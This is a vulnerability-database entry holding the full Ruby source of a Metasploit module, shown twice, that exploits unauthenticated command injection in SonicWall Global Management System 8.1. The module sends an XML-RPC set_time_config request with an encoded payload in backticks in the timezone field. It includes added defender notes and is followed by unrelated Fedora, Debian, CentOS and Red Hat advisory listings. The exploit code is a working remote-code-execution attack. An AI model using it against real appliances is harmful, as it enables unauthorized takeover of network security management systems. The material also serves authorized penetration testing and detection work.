SonicWall Global Management System XMLRPC set_time_zone Unauth RCE
1976-01-01T00:00:00
ID MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE Type metasploit Reporter Rapid7 Modified 1976-01-01T00:00:00
Description
This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz="`command injection here`" --usentp="blah"'. Because the caller-supplied time zone value is placed in that command line unsanitized, backtick command substitution inside it is run by the shell.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for the SonicWall Global Management System
# Virtual Appliance XML-RPC command injection described in the metadata below.
#
# Review notes for defenders:
# - Root cause, per the module description: the XML-RPC listener on port 21009
#   accepts unauthenticated calls, and the time zone string from the call ends
#   up on a timeSetup.sh command line where the shell evaluates backtick
#   command substitution.
# - Exposure reduction: keep the XML-RPC port unreachable from untrusted
#   networks and run a release newer than the affected builds listed below.
# - Detection: look for unauthenticated POSTs carrying a set_time_config
#   methodCall whose timezone member holds backticks or other shell
#   metacharacters.
# - NOTE(review): the module name says "set_time_zone" while the request sent
#   by send_xml uses the method name set_time_config; confirm which is current.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the optional WEB_SERVER_PORT setting.
  #
  # @param info [Hash] metadata passed in by the framework and merged with the
  #   values declared here
  def initialize(info={})
    payload_constraints = {
      # Can't use ampersand, Java's XML-RPC parser will complain and return an error
      'BadChars' => "\x26",
      'Compat' => {
        'PayloadType' => 'cmd',
        'RequiredCmd' => 'generic bash telnet'
      }
    }

    # The description literal is kept flush-left so its text stays exactly as
    # it appears in the listing.
    super(update_info(info,
      'Name' => 'SonicWall Global Management System XMLRPC set_time_zone Unauth RCE',
      'Description' => %q{
This module exploits a vulnerability in SonicWall Global
Management System Virtual Appliance versions 8.1 (Build 8110.1197)
and below. This virtual appliance can be downloaded from
http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a
holistic way to manage your entire network security environment.'
These vulnerable versions (8.1 Build 8110.1197 and below) do not
prevent unauthenticated, external entities from making XML-RPC
requests to port 21009 of the virtual app. After the XML-RPC call
is made, a shell script is called like so:
'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.
},
      'License' => MSF_LICENSE,
      'Author' => [
        'Michael Flanders', # MSF Module
        'kernelsmith'       # Advisor
      ],
      'References' => [
        ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],
        ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']
      ],
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Targets' => [
        ['SonicWall Global Management System Virtual Appliance', {}]
      ],
      'Payload' => payload_constraints,
      'DisclosureDate' => '2016-07-22',
      'DefaultTarget' => 0))

    web_port_option = OptString.new(
      'WEB_SERVER_PORT',
      [false, "Port of web console login page.\nDefaults to 80/443 depending on SSL."]
    )
    register_options([web_port_option])
  end

  # Fingerprints the web console login page and compares the version printed
  # in its <TITLE> element against 8.1.
  #
  # NOTE(review): only the major.minor pair from the page title is compared,
  # so builds of 8.1 cannot be told apart, and a Safe result caused by a
  # missing or altered title is not evidence of a patched appliance. Asset
  # owners should confirm the installed build number on the appliance itself.
  #
  # @return [CheckCode] Unknown when no response arrives; Safe when the page
  #   is not a 200 carrying a "vN.N" title or the version is above 8.1;
  #   Appears otherwise
  def check
    tls_enabled = datastore['SSL']
    scheme = tls_enabled ? 'https' : 'http'
    console_port = datastore['WEB_SERVER_PORT'] || (tls_enabled ? '443' : '80')

    response = request_url("#{scheme}://#{rhost}:#{console_port}")

    unless response
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    title_has_version = response.code == 200 && response.body =~ /<TITLE>.+v(\d\.\d)/
    return CheckCode::Safe unless title_has_version

    reported = Gem::Version.new(Regexp.last_match(1).to_s)
    reported <= Gem::Version.new('8.1') ? CheckCode::Appears : CheckCode::Safe
  end

  # Entry point called by the framework: stops with Failure::NotVulnerable
  # unless check reports Appears, then sends the XML-RPC request.
  def exploit
    fail_with(Failure::NotVulnerable, "The target is not vulnerable.") unless check == CheckCode::Appears

    print_status "The target appears to be vulnerable, continuing exploit..."
    send_xml
  end

  # Builds the set_time_config XML-RPC call and POSTs it to "/" on the module's
  # configured host and port; prints an error unless the reply body contains
  # "success".
  #
  # The timezone member is where the encoded payload is placed, wrapped in
  # double quotes and backticks. That request shape is the one to alert on in
  # proxy or network logs for the XML-RPC listener.
  def send_xml
    request_body = <<~HERESTRING
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>set_time_config</methodName>
      <params>
      <param>
      <value>
      <struct>
      <member>
      <name>timezone</name>
      <value>
      <string>"`#{payload.encoded}`"</string>
      </value>
      </member>
      </struct>
      </value>
      </param>
      </params>
      </methodCall>
    HERESTRING

    request = {
      'method' => 'POST',
      'uri' => '/',
      'data' => request_body,
      'ctype' => 'text/xml; charset=UTF-8'
    }
    reply = send_request_raw(request)

    return if reply && reply.body.include?("success")

    print_error("Error sending XML to #{rhost}:#{rport}")
  end
end
{"id": "MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE", "type": "metasploit", "bulletinFamily": "exploit", "title": "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE", "description": "This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://www.digitaldefense.com/digital-defense/vrt-discoveries/", "https://slides.com/kernelsmith/bsidesaustin2018/#/"], "cvelist": [], "lastseen": "2020-10-14T21:02:34", "viewCount": 71, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2020-10-14T21:02:34", "rev": 2}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0603", "RHSA-2021:0558", "RHSA-2021:0557", "RHSA-2021:0548", "RHSA-2021:0600", "RHSA-2021:0436", "RHSA-2021:0568", "RHSA-2021:0549", "RHSA-2021:0599", "RHSA-2021:0551"]}, {"type": "fedora", "idList": ["FEDORA:D876630B21C8", "FEDORA:1DBB230B131F", "FEDORA:4E16930B130B", "FEDORA:F300430AD103", "FEDORA:3BF713093F7B", "FEDORA:28A5130A3C09"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-9058"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2561-1:72FAB"]}], "modified": "2020-10-14T21:02:34", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"SonicWall Global Management System XMLRPC set_time_zone Unauth RCE\",\n 'Description' => %q{\n This module exploits a vulnerability in SonicWall Global\n Management System Virtual Appliance versions 8.1 (Build 8110.1197)\n and below. This virtual appliance can be downloaded from\n http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a\n holistic way to manage your entire network security environment.'\n\n These vulnerable versions (8.1 Build 8110.1197 and below) do not\n prevent unauthenticated, external entities from making XML-RPC\n requests to port 21009 of the virtual app. 
After the XML-RPC call\n is made, a shell script is called like so:\n 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Michael Flanders', #MSF Module\n 'kernelsmith' #Advisor\n ],\n 'References' => [\n ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],\n ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']\n ],\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [\n [ 'SonicWall Global Management System Virtual Appliance', {} ],\n ],\n 'Payload' => {\n # Can't use ampersand, Java's XML-RPC parser will complain and return an error\n 'BadChars' => \"\\x26\",\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic bash telnet'\n }\n },\n 'DisclosureDate' => '2016-07-22',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.\n Defaults to 80/443 depending on SSL.'])\n ])\n end\n\n def check\n if datastore['WEB_SERVER_PORT']\n port_number = datastore['WEB_SERVER_PORT']\n else\n port_number = datastore['SSL'] ? '443' : '80'\n end\n\n handler = datastore['SSL'] ? 
'https' : 'http'\n\n res = request_url(\"#{handler}://#{rhost}:#{port_number}\")\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n unless res.code == 200 && res.body =~ /<TITLE>.+v(\\d\\.\\d)/\n return CheckCode::Safe\n end\n\n version = Gem::Version.new $1.to_s\n\n unless version <= Gem::Version.new('8.1')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n fail_with Failure::NotVulnerable, \"The target is not vulnerable.\"\n end\n\n print_status \"The target appears to be vulnerable, continuing exploit...\"\n send_xml\n end\n\n def send_xml\n xml_body = <<~HERESTRING\n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <methodCall>\n <methodName>set_time_config</methodName>\n <params>\n <param>\n <value>\n <struct>\n <member>\n <name>timezone</name>\n <value>\n <string>\"`#{payload.encoded}`\"</string>\n </value>\n </member>\n </struct>\n </value>\n </param>\n </params>\n </methodCall>\n HERESTRING\n\n res = send_request_raw({\n 'method' => 'POST',\n 'uri' => '/',\n 'data' => xml_body,\n 'ctype' => 'text/xml; charset=UTF-8'\n })\n\n unless res && res.body.include?(\"success\")\n print_error(\"Error sending XML to #{rhost}:#{rport}\")\n end\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": []}
{"fedora": [{"lastseen": "2021-04-11T00:28:47", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3426"], "description": "Python 3.9 package for developers. This package exists to allow developers to test their code against a newer version of Python. This is not a full Python stack and if you wish to run your applications with Python 3.9, update your Fedora to a newer version once Python 3.9 is stable. ", "modified": "2021-04-10T23:19:28", "published": "2021-04-10T23:19:28", "id": "FEDORA:79CAE30A5759", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: python39-3.9.4-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-11T00:28:47", "bulletinFamily": "unix", "cvelist": [], "description": "libopenmpt is a cross-platform C++ and C library to decode tracked music files (modules) into a raw PCM audio stream. libopenmpt is based on the player code of the OpenMPT project (Open ModPlug Tracker). In order to avoid code base fragmentation, libopenmpt is developed in the same source code repository as OpenMPT. ", "modified": "2021-04-10T23:19:27", "published": "2021-04-10T23:19:27", "id": "FEDORA:D5FC8304C692", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: libopenmpt-0.4.19-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-11T00:28:47", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14372", "CVE-2020-25632", "CVE-2020-25647", "CVE-2020-27749", "CVE-2020-27779", "CVE-2021-20225", "CVE-2021-20233"], "description": " The GRand Unified Bootloader (GRUB) is a highly configurable and customizable bootloader with modular architecture. It supports a rich variety of kernel formats, file systems, computer architectures and hardware devices. 
", "modified": "2021-04-10T23:06:25", "published": "2021-04-10T23:06:25", "id": "FEDORA:5DC52306C90A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: grub2-2.06~rc1-1.fc33", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-11T00:28:47", "bulletinFamily": "unix", "cvelist": [], "description": "libopenmpt is a cross-platform C++ and C library to decode tracked music files (modules) into a raw PCM audio stream. libopenmpt is based on the player code of the OpenMPT project (Open ModPlug Tracker). In order to avoid code base fragmentation, libopenmpt is developed in the same source code repository as OpenMPT. ", "modified": "2021-04-10T23:06:24", "published": "2021-04-10T23:06:24", "id": "FEDORA:CE7C93046B3F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: libopenmpt-0.4.19-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2021-29421"], "description": "pikepdf is a Python library for reading and writing PDF files. pikepdf is based on QPDF, a powerful PDF manipulation and repair library. ", "modified": "2021-04-09T15:41:16", "published": "2021-04-09T15:41:16", "id": "FEDORA:DFC7630CE319", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: python-pikepdf-1.19.4-2.fc32", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27840", "CVE-2021-20277"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. 
", "modified": "2021-04-09T15:41:07", "published": "2021-04-09T15:41:07", "id": "FEDORA:0DD873072EBE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: samba-4.12.14-0.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2020-25097"], "description": "Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. Unlike traditional caching software, Squid handles all requests in a single, non-blocking, I/O-driven process. Squid keeps meta data and especially hot objects cached in RAM, caches DNS lookups, supports non-blocking DNS lookups, and implements negative caching of failed requests. Squid consists of a main server program squid, a Domain Name System lookup program (dnsserver), a program for retrieving FTP data (ftpget), and some management and client tools. ", "modified": "2021-04-09T15:41:07", "published": "2021-04-09T15:41:07", "id": "FEDORA:E851B30CD31F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: squid-4.14-1.fc32", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27840", "CVE-2021-20277"], "description": "An extensible library that implements an LDAP like API to access remote LDAP servers, or use local tdb databases. ", "modified": "2021-04-09T15:41:06", "published": "2021-04-09T15:41:06", "id": "FEDORA:BAC3130A4CEB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: libldb-2.1.5-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": [], "description": "Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). 
The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. The virus database is based on the virus database from OpenAntiVirus, but contains additional signatures (including signatures for popular polymorphic viruses, too) and is KEPT UP TO DATE. ", "modified": "2021-04-09T15:17:22", "published": "2021-04-09T15:17:22", "id": "FEDORA:C624430AF05F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: clamav-0.103.2-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2021-29421"], "description": "pikepdf is a Python library for reading and writing PDF files. pikepdf is based on QPDF, a powerful PDF manipulation and repair library. ", "modified": "2021-04-09T15:17:19", "published": "2021-04-09T15:17:19", "id": "FEDORA:A5D4030A6063", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: python-pikepdf-1.19.4-2.fc33", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2021-04-10T22:30:40", "bulletinFamily": "unix", "cvelist": ["CVE-2020-25085", "CVE-2021-3416", "CVE-2021-3392", "CVE-2021-3409", "CVE-2020-17380", "CVE-2021-20257", "CVE-2021-20255", "CVE-2021-20203"], "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2623-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Markus Koschany\nApril 10, 2021 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : qemu\nVersion : 1:2.8+dfsg-6+deb9u14\nCVE ID : CVE-2020-17380 CVE-2021-3392 CVE-2021-3409 CVE-2021-3416 \n CVE-2021-20203 CVE-2021-20255 CVE-2021-20257\nDebian Bug : 984450 984451 984452 984448 984449 970937\n\nSeveral 
security vulnerabilities have been discovered in QEMU, a fast processor\nemulator.\n\nCVE-2021-20257\n\n net: e1000: infinite loop while processing transmit descriptors\n\n\nCVE-2021-20255\n\n A stack overflow via an infinite recursion vulnerability was found in the\n eepro100 i8255x device emulator of QEMU. This issue occurs while processing\n controller commands due to a DMA reentry issue. This flaw allows a guest\n user or process to consume CPU cycles or crash the QEMU process on the\n host, resulting in a denial of service.\n\nCVE-2021-20203\n\n An integer overflow issue was found in the vmxnet3 NIC emulator of the\n QEMU. It may occur if a guest was to supply invalid values for rx/tx queue\n size or other NIC parameters. A privileged guest user may use this flaw to\n crash the QEMU process on the host resulting in DoS scenario.\n\nCVE-2021-3416\n\n A potential stack overflow via infinite loop issue was found in various NIC\n emulators of QEMU in versions up to and including 5.2.0. The issue occurs\n in loopback mode of a NIC wherein reentrant DMA checks get bypassed. A\n guest user/process may use this flaw to consume CPU cycles or crash the\n QEMU process on the host resulting in DoS scenario.\n\n\nCVE-2021-3416\n\n The patch for CVE-2020-17380/CVE-2020-25085 was found to be ineffective,\n thus making QEMU vulnerable to the out-of-bounds read/write access issues\n previously found in the SDHCI controller emulation code. 
This flaw allows a\n malicious privileged guest to crash the QEMU process on the host, resulting\n in a denial of service or potential code execution.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:2.8+dfsg-6+deb9u14.\n\nWe recommend that you upgrade your qemu packages.\n\nFor the detailed security status of qemu please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/qemu\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-04-10T21:21:20", "published": "2021-04-10T21:21:20", "id": "DEBIAN:DLA-2623-1:40F55", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202104/msg00009.html", "title": "[SECURITY] [DLA 2623-1] qemu security update", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-10T22:24:34", "bulletinFamily": "unix", "cvelist": ["CVE-2021-30157", "CVE-2021-30154", "CVE-2021-20270", "CVE-2021-27291", "CVE-2021-30155", "CVE-2021-30152", "CVE-2021-30158", "CVE-2021-30159"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4889-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 10, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki\nCVE ID : CVE-2021-20270 CVE-2021-27291 CVE-2021-30152 CVE-2021-30159\n CVE-2021-30154 CVE-2021-30155 CVE-2021-30157 CVE-2021-30158 \n\nMultiple security issues were found in MediaWiki, a website engine for\ncollaborative work, which could result in incomplete page/blocking\nprotection, denial of service or cross-site scripting.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 1:1.31.14-1~deb10u1.\n\nWe 
recommend that you upgrade your mediawiki packages.\n\nFor the detailed security status of mediawiki please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/mediawiki\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-04-10T15:47:12", "published": "2021-04-10T15:47:12", "id": "DEBIAN:DSA-4889-1:BE561", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00070.html", "title": "[SECURITY] [DSA 4889-1] mediawiki security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-04-10T22:22:01", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27379", "CVE-2021-26933"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4888-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 10, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nCVE ID : CVE-2021-26933 CVE-2021-27379\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor,\nwhich could result in denial of service, privilege escalation or memory\ndisclosure.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.11.4+99-g8bce4698f6-1.\n\nWe recommend that you upgrade your xen packages.\n\nFor the detailed security status of xen please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xen\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: 
debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-04-10T15:38:52", "published": "2021-04-10T15:38:52", "id": "DEBIAN:DSA-4888-1:6EB73", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00069.html", "title": "[SECURITY] [DSA 4888-1] xen security update", "type": "debian", "cvss": {"score": 5.9, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-04-09T22:15:01", "bulletinFamily": "unix", "cvelist": ["CVE-2021-28658"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2622-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Chris Lamb\nApril 09, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : python-django\nVersion : 1:1.10.7-2+deb9u12\nCVE ID : CVE-2021-28658\nDebian Bug : #986447\n\nIt was discovered that there was a potential directory traversal\nissue in Django, a Python-based web development framework.\n\nThe vulnerability could have been exploited by maliciously crafted\nfilenames. 
However, the upload handlers built into Django itself\nwere not affected.\n\nFor Debian 9 "Stretch", this problem has been fixed in version\n1:1.10.7-2+deb9u12.\n\nWe recommend that you upgrade your python-django packages.\n\nFor the detailed security status of python-django please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/python-django\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-04-09T11:48:27", "published": "2021-04-09T11:48:27", "id": "DEBIAN:DLA-2622-1:ECA08", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202104/msg00008.html", "title": "[SECURITY] [DLA 2622-1] python-django security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "centos": [{"lastseen": "2021-04-10T22:38:01", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20277"], "description": "**CentOS Errata and Security Advisory** CESA-2021:1072\n\n\nThe libldb packages provide an extensible library that implements an LDAP-like API to access remote LDAP servers, or use local TDB databases.\n\nSecurity Fix(es):\n\n* samba: Out of bounds read in AD DC LDAP server (CVE-2021-20277)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2021-April/048299.html\n\n**Affected packages:**\nldb-tools\nlibldb\nlibldb-devel\npyldb\npyldb-devel\n\n**Upstream details at:**\n", "edition": 1, "modified": "2021-04-10T17:14:31", "published": "2021-04-10T17:14:31", "id": "CESA-2021:1072", "href": "http://lists.centos.org/pipermail/centos-announce/2021-April/048299.html", "title": "ldb, libldb, pyldb security update", 
"type": "centos", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-10T23:43:32", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27365", "CVE-2021-27364", "CVE-2021-27363"], "description": "**CentOS Errata and Security Advisory** CESA-2021:1071\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: out-of-bounds read in libiscsi module (CVE-2021-27364)\n\n* kernel: heap buffer overflow in the iSCSI subsystem (CVE-2021-27365)\n\n* kernel: iscsi: unrestricted access to sessions and handles (CVE-2021-27363)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Customer testing eMMC sees and intermittent boot problem on 7.8+, was not seen on 7.3 (BZ#1918916)\n\n* tcm loopback driver causes double-start of scsi command when work is delayed (BZ#1925652)\n\n* [Azure][RHEL-7]Mellanox Patches To Prevent Kernel Hang In MLX4 (BZ#1925691)\n\n* A patch from upstream c365c292d059 causes us to end up leaving rt_nr_boosted in an inconsistent state, which causes a hard lockup. 
(BZ#1928082)\n\n* [RHEL7.9.z] Add fix to update snd_wl1 in bulk receiver fast path (BZ#1929804)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2021-April/048298.html\n\n**Affected packages:**\nbpftool\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\n", "edition": 1, "modified": "2021-04-10T17:09:38", "published": "2021-04-10T17:09:38", "id": "CESA-2021:1071", "href": "http://lists.centos.org/pipermail/centos-announce/2021-April/048298.html", "title": "bpftool, kernel, perf, python security update", "type": "centos", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-04-10T19:36:27", "description": "A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.", "edition": 1, "cvss3": {}, "published": "2021-04-09T18:15:00", "title": "CVE-2021-20021", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-20021"], "modified": "2021-04-09T18:54:00", "cpe": [], "id": "CVE-2021-20021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20021", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-04-10T19:36:27", "description": "SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to upload an arbitrary file to the remote host.", "edition": 1, "cvss3": {}, "published": "2021-04-09T18:15:00", "title": "CVE-2021-20022", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-20022"], "modified": "2021-04-09T18:54:00", "cpe": [], "id": "CVE-2021-20022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20022", "cvss": {"score": 0.0, 
"vector": "NONE"}, "cpe23": []}], "redhat": [{"lastseen": "2021-04-10T20:28:18", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20305"], "description": "Nettle is a cryptographic library that is designed to fit easily in almost any context: In crypto toolkits for object-oriented languages, such as C++, Python, or Pike, in applications like LSH or GNUPG, or even in kernel space.\n\nSecurity Fix(es):\n\n* nettle: Out of bounds memory access in signature verification (CVE-2021-20305)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-04-09T01:11:54", "published": "2021-04-09T00:53:25", "id": "RHSA-2021:1145", "href": "https://access.redhat.com/errata/RHSA-2021:1145", "type": "redhat", "title": "(RHSA-2021:1145) Important: nettle security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}